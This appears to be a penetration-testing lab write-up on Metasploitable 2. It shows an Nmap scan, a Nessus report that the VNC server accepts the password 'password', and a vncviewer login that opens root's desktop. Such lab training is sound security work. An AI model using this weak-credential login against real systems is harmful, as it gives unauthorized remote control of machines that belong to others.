The Nmap scan of Metasploitable 2 revealed:
PORT     STATE SERVICE VERSION
5900/tcp open  vnc     VNC (protocol 3.3)
The guides available online for exploiting this VNC service all rely on brute-force techniques; the Nessus output for this port, however, is far more revealing:
Port 5900/tcp
VNC Server ‘password’ Password
Synopsis
A VNC server running on the remote host is secured with a weak password.
Description
The VNC server running on the remote host is secured with a weak password. Nessus was able to login using VNC authentication and a password of ‘password’. A remote, unauthenticated attacker could exploit this to take control of the system.
Solution
Secure the VNC service with a strong password.
Risk Factor
Critical
CVSS Base Score
10.0 (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)
Plugin Information:
Publication date: 2012/08/29, Modification date: 2012/08/29
Ports
tcp/5900
Nessus logged in using a password of “password”.
As we can see, Nessus has already done the hard work and discovered that the VNC password is “password”.
All that’s left for us to do is log in to the VNC service from the attacking terminal:
# vncviewer 192.168.1.103
Connected to RFB server, using protocol version 3.3
Performing standard VNC authentication
Password:
Authentication successful
Desktop name "root's X desktop (metasploitable:0)"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
And up pops the virtual desktop: